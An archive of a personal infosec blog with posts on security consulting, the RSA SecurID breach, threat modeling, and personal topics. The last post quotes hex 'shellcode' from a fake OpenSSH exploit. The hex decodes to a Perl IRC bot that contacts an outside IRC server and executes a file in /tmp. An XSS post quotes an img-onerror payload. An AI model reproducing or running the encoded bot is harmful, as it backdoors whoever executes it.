Cykyc Thoughts

The Losing of a Consciousness

2011-10-16T17:10:00.000-06:00

I sit here, high above my Brooklyn city below. My view is west, blotted by Brooklyn Heights, down to Buttermilk Channel, up to the East River, across to New Jersey. My view is distance and beautiful. It is away. My view is a perfect analogy of my consciousness. Distance, away. Ignorant. Call this the sub-ego, a portion of the self whose aim to to protect the self by ignorance.

I once recalled the difficulty of asking a friend to lend me $20. I felt a heavy obligation to pay it back. It took a week, where I saved a bit each day. The stress of this was an emotional stir. At this time in my life, that $20 was a large amount to me. It supported me. It was nourishment. Today, $20 has the same meaning to me as $100. They are peers in my mind. This is not me being a braggart. Perhaps, it is more of a confession of how far away I have gotten from my roots.

The sub-ego, or whatever it should be called, drove me to seek out what I did not have or did not want. I didn't dislike being poor, because it was what I knew. And no one could have considered me a pauper, for I wasn't destitute. But as I reaped the fruits of my experience, fertilized by the many in my society, I became ignorant of who I was. I forgot the meaning of $20.

It's amazing what this apathy, grown from ignorance, does to the self. From my view, I can see the tops of buildings, the iconic precipices jutting out of the jungle of Manhattan. Yet, I cannot see the trees below. Nor can I see the courage of those willing to camp out in these trees, waving their fists against what they deem is wrong with society. I cannot hear them, for indifference deafens the ears. I cannot feel them, because I am comfortably numb.

Time Sharing My Time

2011-09-05T13:57:00.000-06:00

So I'm trying something out today, on this wonderful Labor Day. I find I start a lot of small to medium projects that get going, but then die. I could create a list, though it would just make me sad. I find I keep on going on a project when I keep on accumulating small *wins*. That could be added functionality to a program, seeing the accomplishment in action, or getting positive feedback from others. Yes, my ego needs a lot of care and uptake and my mind loves the dopamine release on receiving a reward. Whatever, gotta work with the machine I got :-)

So, today, I tried time sharing my projects. I started a 45 minute timer, and walked down a list of projects. Each got 45 minutes, then whatever amount of break in between. It's a holiday so the breaks are a reward into themselves. If I was billing or charging to a company project, I'd probably care more (or not ; -)

Well, it seemed to work out so far. I went from assessing some technology, documenting changes (locally) to attack surface wording for an OWASP project, playing with puppet, and now onto some node.js stuff. That variability helps keep me motivated to do more, snack bites at a time. Even if I got steam, I was happy to start. It was kinda like a cliffhanger. Otherwise, I run the risk of going through a manic-obsessive cycle, where I spend 10 hrs doing one task and then don't touch it for a month.

Time will tell if this little process change helps or hinders. But at least on today's holiday, it helps.

Cheers!

Measuring An Application's Attack Surface To Measure Consultancies

2011-07-07T04:54:00.001-06:00

The ability to as-automatically-as-possible measure an application's surface area / attack surface should be one of the Millennium Prizes. Sadly, they only care about stupid problems such as does P=NP? Of course it does! For application security, this measurement can provide a comparable metric to the application's potential for security issues. Enough on that. I'm not trying to prove out an app's security this time. I want navel-gaze at our wonderful infosec industry.

An interesting byproduct of adequately measuring an app's attack surface, and to use the CMU researchers' verbiage, channels, methods, data and entry points, is that it provides a lot of scoping information on the application. No, no, no, I don't care about using this to guess the right amount of hours to assess an app (although that's possible). Rather, imagine if the client stated to a consultancy the following.

Client: "Hello Consultancy."
Consultancy: "Hello Client."
Client: "We have App XZY that has one channel of concern, with 15 direct entry points (methods that receive environment data)."
Consultancy: "Sounds good!"

[... time passes, consultancy is assessing application ...]
Consultancy: "Hello again Client!"
Client: "Hello again Consultancy!"
Consultancy: "We analyzed each of the 15 entry points and found the following. On average, each entry point used 25 different portions of the data, for a total of 375 data fragments [my word] consumed by the entry points. Out of these 375 data fragments, 200 were used in a conditional statement somehow, 100 were persisted by the application and 75 were reflected back to the user. We then examined each of those data fragments for appropriate validation and contextual encoding, if necessary. Blah blah blah XSS blah blah blah SQLi blah blah blah."
Client: "Wow! That's a lot of numbers that don't mean anything to me!!!"
Consultancy: "Oh, hold the boat there Mr. Client! You can start to use these numbers to measure the efficacy of other consultancies and tools. Of course that new Sprint you're about to do on your codebase will screw up all of these numbers. But, you can pay me to measure this again!"
Client: "Oh, I see. So, I can measure your work against another consultancy's work and see how closely you all got."
Consultancy: "Yeppers. So, when we leave here, you'll have at least an idea of what we did. You should then get someone else in the door to do an assessment on this app and see what they come up with. The sooner, the better, since you're pushing new code to QA this Friday."

So, yeah, measuring an app's attack surface down to how many data fragments exist (think HTTP parameters or header content for a web app) and how they're used can become a relative metric on the efficacy of consultancies, in addition to the many other benefits it provides. But, as I snarkily allude to above, it's fraught with issues, especially on the "freshness" of those measurements. I so wish magical tools did this. Our industry, and our client's appsec, would only benefit from it.

RSA SecurID Hack, Should I Care?

2011-03-18T08:26:00.002-06:00

Twitter was abuzz yesterday and today on the RSA hack. From what I could infer, worst case, the SecurID seed files may have been disclosed in a hack. A quick primer on SecurID is needed to see why this is and isn't an issue.

Token: hardware or software device that displays a token code
Token code: pseudo-random numbers displayed on a RSA token. Can change at different frequencies (30 seconds, 1 minute, etc.)
PIN: user's secret code. Can be numeric or alphanumeric, depending upon configuration.
Passcode: PIN+tokencode

RSA SecurID uses soft and hard tokens. I'll focus on the hard tokens for this. The tokens as I understand them are PRNG. Each token has a random seed to start its PRNG. The date and time the token was started with the seed, along with the seed itself, and the token's serial number, are sent to the customer. The customer then loads this seed file into the Primary SecurID server at the customer's premise. The Primary then can guess the current tokencode displayed on the token by inputting this seed into the PRNG. Clock-skew aside, the code computed by the Primary should be the code displayed on the token.

As the customer adds users to the system, the customer associates a token to some user ID. This association should never be known outside of the Primary, secondaries, and backups. Usually front-end authenticators communicate to the Primary, via RADIUS, RSA's own proprietary protocol, or other supported methods. So, assuming an attacker has obtained the seed files, token serial numbers, and the organization that received the seed files, they'll still need to know the user ID association, the user's PIN, and the relative clock skew of the token.

The RSA hack though only buys the attacker the first part of the equation (seed, token, date). The attacker would still need to perform a targeted attack against a user / org to obtain the token <=> user mapping AND the user's PIN. The Primary has mitigating controls to lock out a user after some amount of failed login attempts. But, let's hand-wave and say the attacker has somehow obtained the token <=> user account mapping and the user's PIN, which could be the user's domain password in some setups. They still need to generate the tokencode on the token.

Getting back to clock skew, since physical tokens are physical, its clock will skew over time. The Primary stores this skew and allows a range. The more the token is used, the better the Primary will know its skew. If the token is too far out of skew, the Primary will log an event and require the to user enter the subsequent token code. If the token continues go to out of skew, the Primary will disallow its use and require the user to obtain a new token. An attacker starting a blind attack will not know the token's relative skew. So, even if this is a targeted attack against an individual, where the attacker knows the seed, token serial number, user ID, and user's PIN, there's still even a chance that the attacker will not be able to authenticate because of the token's clock skew will be too far off.

With all of this, there is some worry. If you're in a small organization with say 20 people, it'll be easier for a knowledgeable attacker to associate some random token to some user account. RSA should also do the right thing and allow organizations to replace their tokens if the organizations deem it necessary, free of charge. A large organization will probably not do this, though. It's costly to do mass upgrades of tokens. For example, each token has an expiration date of usually 2-3 years. After this time, an organization will have to phase in a token replacement process. Support calls go up. People get locked out. It's a pain. But, if you're a small shop, it's easier to manage this. And, if you're a small shop, you're at a higher risk.

In the end, it's about your organization's relative risk. I just don't see a big story here.

(Updated 11:37 EDT: noticed I wrote PIN/passcode before. This was incorrect. Changed to PIN.)

Dropping the Race Card

2011-02-27T11:27:00.000-06:00

I recently watched again the movie Malcolm X. There's a good scene when Malcolm X and Baines are going through an English dictionary and comparing connotations between words starting or containing white versus black. The movie posits English words containing white often have some type of positive connotation whilst words containing black have negative connotations. Does infosec and IT in general carry over these connotations? To me...

Black-box versus white-box testing: white-box is more open, transparent, easier to test
Blacklists versus white lists: blacklists are bad, mmmkay
Black hats versus white hats: I'm apathetic to either but those evil blackhat scofflaws! ;-)
...

Yeah, it seems to me. This isn't a poke at Infosec by me since I haven't perceived overt racism by the people I follow or with whom I associate. And also to be fair, these words weren't introduced by Infosec. They were borrowed from some other context.

However, being ethnically a Euro-mutt, my perceptions are more than likely biased. Words do carry meaning, implied or not. I don't see this as a political-correctness issue. Rather, our words frame our mindset. Kinda like a same-origin policy breach. If I connote a feeling with a particular word, it will by nature, leak out into different realms of my being.

Now, having grown up and lived in Minnesota (you betcha!) most of my life, I do not connote the word white with 100% positive emotions; white snow definitely solicits negative feelings in me :-) But I do see the connotations and don't want to perpetuate them. Sadly, the alternatives aren't full of awesome-sauce:

Black hat versus white hat: unauthorized hackers versus authorized hackers? (and hackers carries its own connotations... geez)
Blacklists versus white-lists: exclusion-only filters versus inclusion-only filters? (7 syllables to replace 2 ain't cool)
Black-box testing versus white-box testing: zero-knowledge testing versus full-knowledge testing? (not too bad)

So, as I lose the connotations I gain verbosity. Foo. Win some, lose some. At least I'll connote dry, boring words than some deep-seated emotion. I guess that's a win, ain't it?

Complexity != Insecurity

2010-12-16T16:34:00.001-06:00

Why do organizations often tend to introduce more complexity! Complexity is harmful for security ("KISS" principle) - @xme

I saw this tweet this morning and cried again. It was a really long cry. Actually, it was sweat going into my eyes because I'm out of shape and on the elliptical. Pretend they were tears of sadness!

Complexity does not equal insecurity. Complexity is not harmful for security. Heck, complexity is welcomed! Sometimes... And, arguably, sometimes not. Complexity can be needed for security, scalability, and consistency. And brother, I'm gonna preach on why.

Complexity Needed For Security

This is a cheap shot. Tell me, what's more of a complex protocol? HTTP or HTTP over a TLS connection? Think TLS isn't complex? It is. But its complexity and functionality add confidentiality, integrity, and authentication to a connection that doesn't directly offer those features. I won't focus on this one, but think about it.

Complexity Needed for Scalability

Before venturing here, be familiar with Big O notation. At least don't be afraid of O(1), O(N), and O(c^N).

UNIX systems manage passwords via a shadow or master password file. A sysadmin managing a small number of UNIX systems may be inclined to manually make updates to these files via their supported methods. The sysadmin might have to infrequently add or delete accounts, as needed and requested. This is very manageable and scales well to the scenario.

The sysadmin didn't realize his company would explode in growth over the next year. Each week brought on scores and scores of new employees and also the need for more and more servers. Now, instead of managing a couple changes a day over a couple systems, the sysadmin is coping with numerous changes a day, across a growing expanse of systems. Performing this manually is time consuming and also adds inflexibility if the sysadmin needs to quickly disable access.

The sysadmin, being lazy, hooks up to the company's Active Directory instance via LDAP. Now, the sysadmin needs to modify PAM modules (authentication) and name service lookups (authorization) across all of these systems. The sysadmin has effectively increased the complexity of a login from a local lookup to a remote lookup because a procedure that was O(N*M) for a small number of users (N) and a small number of servers (M) is inappropriate for larger sizes of N and M. And the sysadmin gets a security benefit by being able to quickly lock out or disable an account if needed. Is this added complexity more or less insecure?

Complexity Needed for Consistency

Building upon the LDAP example, the sysadmin was managing just CentOS servers. After the growth, the servers were made up of Solaris, CentOS, Redhat and FreeBSD because of business needs. Each of these had different ways to enforce account capabilities and restrictions, such as number of failed attempts before lock out, password complexity and strength, and password expiry days.

Some systems couldn't support what the policy required. Others took time to understand, test, and implement. And others would only work for certain services, say OpenSSH, but not other services, on the server. By having PAM support the authentication and connecting to the LDAP server, the LDAP server can be a single point of control. Or, rather in Big O notation, the sysadmin reduced an O(N) problem to an O(1) problem, with N being the number of servers needing the change. Oh, and I won't mention that the sysadmin will add some more complexity by using STARTTLS with his LDAP implementation to not disclose the hashes being sent across the wire ;-)

Trite Examples, Blah!

Perhaps. The point I'm trying to make is that complexity isn't and shouldn't be viewed as a bastard in the eyes of security. It's not. If the goal of complexity is commensurate with security goals, then it's a win. If complexity changes a process from O(N) to O(1), awesome! If complexity actually adds security at little perceived loss, even better. So, please, if you're gonna beat up on complexity, at least say unnecessary complexity. Because there's a lot of complexity out there that's keeping us secure, and it's a good thing :-)

Threat Modeling, Attack Trees, Call Graphs, Oh My!

2010-12-05T17:16:00.000-06:00

Let's say I'm able to dynamically and statically analyze an application running on some platform. This analysis is so full of awesome that it enumerates every entry and exit point in the application. It enumerates all ways that data is touched, modified or/and returned to the user of the application. It understands authentication and authorization, from the interface down to the underlying operating system.

So what. Really, who cares. There's absolutely no context with this contrived analysis. Let's say that the application above only accesses information deemed public by the application owner. Let's say that the machine has no way to pivot to any other resources: an island. Then what? And why am I wasting time on a post like this that seems pretty obvious?

We have threat modeling, attack trees, call graphs, and everything at our disposal. Automation can get us far, but without subjective context, especially on asset valuation, everything looks the same. I'm all for measurements. We're no where near as an industry in enumerating what applications can do, what they touch, and even how to process all of this information. But even if we were, we would still be silly and mark a remotely exploitable vulnerability that popped root on this application as a "high", whatever that means. Whereas in reality, this asset has such little value that it's not even worth including its system name in a report.

We do not do a good job assessing asset values, however subjective. Yes, there's value for an attacker. At a minimum, can I pivot from this host? Can I now access something I wasn't able to access before? These are valid and should be called out if there's reason to. But, what about the data? Not all assets are equal and we should stop treating them as they are.

Too Long for 140: Developers and Security Training

2010-10-14T07:09:00.000-06:00

(Disclaimer: I work for a company that provides security training to developers. My opinions here do not reflect my employer.)

Caleb Sima (@csima) dropped this nugget:

Just got accepted to speak at RSA on not teaching developers about security

This was retweeted by Jeremiah Grossman (jeremiahg):

RT @csima: Got accepted to speak at RSA on not teaching developers about security < I'd agree in theory, implementation is the hard par

Jeff Williams (@planetlevel) hit back:

@jeremiahg @csima Not teaching developers security is dangerous nonsense. Automatic securification can never exist.

I see the application security model similar to this:

Dev: Wow, new whizbang tech that lets me do a, b, and c!
Infosec Guy: Wow, Dev is using new whizbang tech that allows me to violate x, y and z!
Infosec Guy to Dev: Stop using whizbang tech!
Dev to Infosec Guy: Stop stopping me from being {productive, cool, whatever}!
Infosec Guy to Dev: OK, at least implement these onerous and difficult security controls!
Dev to Infosec Guy: Wow, these controls suck and I never get them right...
Infosec Guy: Wow, the Dev people and dumb because they can't implement these onerous controls...
[Time passes]
Infosec Guy to Dev: Hey! Someone created a framework that magically implements the security controls that you can't seem to grasp!
Dev to Infosec: Awesome! Now I need to learn this new framework, backport it into all 1000 enterprise apps, deal with the framework changing every week, being backwards-incompatible, and still have gaps because it doesn't work with m, n, and o frameworks!
[Time passes]
Infosec Guy: Wow, new whizbang tech that lets me do a, b, and c!
...

As for training, though, I'm blasé on it. Unless a developer expresses curiosity on the intricacies of how a weakness in their code can be exploited, I think security training is a waste of time. I think the training should be offered, but not forced. We hope a developer appreciates the sophistication around exploiting a vulnerability, but we cannot 'learn' them. This is where frameworks come in.

Eventually, frameworks (e.g. Hibernate, Spring) do pop up that implement some security control that is somewhat transparent to a developer. I'm a big fan of this approach and think that information security should act more as editors, with developers acting as authors; let them write code!

So, what do we do in-between that time, when no frameworks exist and when developers and infosec are on different pages?

Bar None NYC and Watching a Twins Game

2010-10-07T04:29:00.000-06:00

I hit Bar None last night in the hopes of being able to wear my Morneau jersey in peace. The bar is known as a Vikings fan club bar, which I think means that some Vikes fans hit it on game day and a couple TVs are showing the game. The bar itself is about drinking; there's no food. If you're hungry, grab something from outside and bring it it!

When I got there 1/2 or so before the game, I was happy to see I wasn't the only Twins fan. There were a couple guys in Twins gear spaced out. So, apparently I wasn't along in speculating. Well, funny enough, it's still a Yankees bar, but the DJ running the show was gracious enough. They were wondering why they had so many Twins fans though. :-)

I'm gonna hit a Red Sox's bar tonight (enemy of my enemy is my friend and all that) with a couple guys I met last night. Let's bring this series to 1-1 boys!

Source Code Assessment Strategies

2010-09-28T11:35:00.000-06:00

Must be ideal thought day even though I'm doing billable work :-)

When reviewing source code, I find I use these three strategies / heuristics:

Breadth-first, shallow depth
Depth-first, based on information / judgment
Hill-climbing, using general security categories as neighbors

Breadth-first is used to get a feel for the app. If something smells about the app, then a depth-first occurs at that area after the breadth-first search. Also, any business drivers or common application patterns are used to drive other depth-first searches. Once these are exhausted, any other security categories are chosen and followed, almost like a stochastic hill-climbing strategy. Usually by this time, project time is running out and documentation is occurring.

What do you use?

Probably Nothing Special: Blabbermouths on Twitter

2010-09-28T07:06:00.000-06:00

Had a side thought that I'm sure someone has already thought of and implemented:

Find an account on Twitter that requires authz to view his or her account
From an authn'd but unauthz'd Twitter API client, do the following:

Enumerate all the followers and following of this person (authn'd users can do this)
Search favorited tweets from this user; store the blabbermouth
Search conversations from this user; store the blabbermouth
Search RT's / @mentions for this user; store the blabbermouth

Use the gathered favorited and conversation data to reconstruct a timeline (tweet IDs are time stamps) of possible tweets
Use the @mentions and RTs to match up the tweet to a possible timeline tweet

It's more that likely that one cannot construct a full timeline of some target's tweets. Also, matching up the RTs / @mentions is fraught with mismatching. But, one could start to see who blabs out all of the tweets and then unfollow that person. I'm sure my account would be unfollowed since I do the above with impunity :-) That is, Twitter is not meant for secrets.

XSSed By Gareth Heyes

2010-09-28T06:35:00.001-06:00

I recently got an iPad to be extra douchey. I'm using it as a PDF and eBooks reader mostly and wanted to get a good RSS reader in the mix. While Google Reader isn't bad, and under the hood it output encodes the crap out of everything, I'm not a big fan of the interface. I looked around for some app-specific readers and came across Feeddler.

Feeddler can authenticate, via credentials (yuck) to one's Google account. (Note to self, create another google account just for RSS feeds. Note to others, my XSSed gmail account is only used for RSS and this blog.) Once authenticated, it grabs the Google feed settings and then parses it, displaying a similar outline to Google Reader.

I've been out of touch with my RSS feed lately and started going through the back issues. I flipped open The Spanner, an insightful feed authored by Gareth Heyes. Do not follow him on twitter, btw. And, for the yanks in the group, a spanner is a wrench. The article, XSS Zones, ironically fired an XSS in Feeddler:

Got XSSed by @garethheyes and all I got was an alert(1)

Here's the evil code:

&lt;!– End XSS zone –&gt;&lt;img src=1 onerror=alert(1)&gt; and they have broken out of the

See that HTML-encoded img tag? Yeah... Dunno what's going on under the hood, but between Feeddler, Google Reader, and the article, Feeddler decided to execute that block and fire an alert. D'oh!! So, now anyone can XSS Feeddler via a properly encoded feed and have fun in the context of probably one's Google Reader account. Not funny :-)

Needless to say, I went back to Google Reader and quickly deleted Feeddler.

Security Justice / Wikid Podcast: No More Integration!

2010-06-05T11:34:00.000-06:00

I just started subscribing to the Security Justice podcast after talking to @ben_p during the last Minnesec meetup. Today I'm listening to SJ interviewing Wikid Systems on their two-factor authentication product. Nick, the CEO of Wikid makes the following quote:

"Well, one, I think, um, you need a, the lead steers need to be the information security geeks who really say I want two-factor for this, I will switch, I will pay extra for Google Apps for my domain because it will support two-factor authentication."

No, I do not want Google to support your two-factor authentication, nor RSA's, nor anyone else. I don't want them to even know what two-factor means. I want you or perhaps Hurricane Labs to stand up a SAML Identity Provider (IdP) that I can configure into my Google Apps for Domain console. Google allows this today. According to their docs, one IdP can support multiple domains, so this wouldn't be limited to just my domain.

We need to get away from one-to-one "federated" integration and start thinking about General IdP <-> consumer <-> Service Provider federation. Yeah, I move my security now to your controls on the IdP versus Google's. This may introduce more risk. For consumers and small businesses, general IdPs are the future.

Does anyone know of a general IdP that supports Wikid?

Virtualizing Leopard (In Progress)

2010-04-26T08:22:00.000-06:00

Here are the steps I used from DVD to virtualized Mac OS X Leopard:

Convert DVD to Sparse Image [1]:

Insert the OS X Leopard DVD (not the bundled OS install; needs to be retail install disk)
Open Disk Utility
Create "New Image"

Name can be anything
It's easiest to save on your desktop
Size: 8.0GB (Dual Layer)
Encryption: None
Format: Spare Disk Image

Click the image you just created and then click the "restore" tab for that.
Drag the "Mac OSX Install DVD" image into the source and then drag the image you just created into the destination field.*
Click Restore
Go grab a soda . . . Take a Nap . . .

* I didn't do this. Rather, at a Terminal prompt, I ran `mount` to see what disk the install DVD was at and used that as the source. For my setup, that was /dev/disk2s3.

Convert Sparse Image to ISO:

Eject the sparse image
From Terminal:

hdiutil makehybrid -o ~/Desktop/leopard.iso -iso -joliet ~/Desktop/leopard.sparseimage
Reading Driver Descriptor Map (DDM : 0)…
Reading Apple (Apple_partition_map : 1)…
Reading Macintosh (Apple_Driver43 : 2)…
Reading Macintosh (Apple_Driver43_CD : 3)…
Reading  (Apple_Free : 4)…
Reading Macintosh (Apple_Driver_ATAPI : 5)…
Reading Macintosh (Apple_Driver_ATAPI : 6)…
Reading  (Apple_Free : 7)…
Reading Patch Partition (Apple_Patches : 8)…
Reading disk image (Apple_HFS : 9)…
...............................................................................
Elapsed Time:  9m 45.349s
Speed: 13.9Mbytes/sec
Savings: 0.0%
created: /Users/Web/Desktop/leopard.iso.cdr

Change the Darwin support utils ISO to use Leopard client semantics versus server semantics [2]:

From Terminal:

sudo bash
cd "/Library/Application Support/VMware Fusion/isoimages"
mkdir original
mv darwin.iso tools-key.pub *.sig original
perl -n -p -e 's/ServerVersion.plist/SystemVersion.plist/g' <> darwin.iso
openssl genrsa -out tools-priv.pem 2048
openssl rsa -in tools-priv.pem -pubout -out tools-key.pub
openssl dgst -sha1 -sign tools-priv.pem <> darwin.iso.sig
for A in *.iso ; do openssl dgst -sha1 -sign tools-priv.pem < $A > $A.sig ; done
exit

Start VMWare Fusion and create a new VM:

Applications -> VMWare Fusion
From Menu, File -> New

Click "Continue without disc"
Select "Use operating system installation disc image file:" and choose the ~/Desktop/leopard.iso file
Click Continue
For "Operating System", select "Apple Mac OS X"
For "Version", select "Mac OS X Server 10.5"
Click Continue
Click Finish and save

[1] http://notepad.bobkmertz.com/2007/10/making-back-up-copy-of-osx-leopard.html
[2] http://www.macgeekblog.com/blog/archive/2008/09/03/hack-vmware-fusion-2-virtualize-tigerleopard.html

On Authorship and the Book Publishing Industry

2010-02-23T12:21:00.000-06:00

I am not an author. I cut my teeth in the book binding business. And, unfortunately, I have spent a lot of time as a critic. Starting soon, though, I will work in an outsourced editorial department! But, alas, I am not an author. I have enjoyed reading many published works out there by up-and-coming and also accomplished authors. I tend to focus only on a couple genres, most of which others consider boring or commonplace, but so be it. This is just a heads up letting you know where I'm coming from, that's all.

You authors write great books! You really do! Be it historical, fiction, non-fiction, autobiographies, etc., some of you should go down in the annals of all-time authors out there, even if your piece in the tome is not attributed outside of the publishing house. You have great character development, wonderful prose, a well-timed climax, and just an unforgettable narrative in general. But, there are the critics.

Being a critic, don't listen to us. Well, listen to us only if you have no in-house editors and can't afford outsourced ones. More on that later. You're the ones writing the books, keeping the publishing house in business. Critics usually don't work for the publishing house. Rather, they work for periodicals or dailies trying to find controversy than provide editorial insight and services. Critics do have a place, though, at the table, just at the kid's table.

Editors, though, please mind. They are your friends and allies, more so than you realize. These masochists enjoy reading The Chicago Manual of Style (CMS) and helping authors adhere to style guidelines while not ruining the story. They also want authors to avoid having their stories and books torn apart by the critics. Some critics are rightly influential in their criticism and can take a book out of circulation or require a newer editions released sooner than expected. The editors' battles never end.

As an author, don't become an editor unless you need to or want to become one. To pontificate on the merits of split infinitives or dangling participles only furthers you from your goal of writing your story. If you need to, refer to the CMS. Even better, learn how to avoid some common grammar mistakes by incorporating freely-available sentences and structure. Most authors would be abhorred to re-use other authors' works, but please do! This is not plagiarism; this is to help you! The worst case is that you try to write your own grammar style guides whilst not properly trained, failing miserably and feeding the critics all the same. And, if all you can do is use spell checkers, it's better than nothing.

So, please keep on writing. Involve your editors sooner than later. But, don't sweat the small stuff. You got enough on your plate :-)

Funny Fake Openssh 0Day

2010-02-07T12:49:00.000-06:00

Head over to PenTestIT to view a fake OpenSSH 0day called "openssh-53p1-remote-root.c". Here's the first fake shellcode:

char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
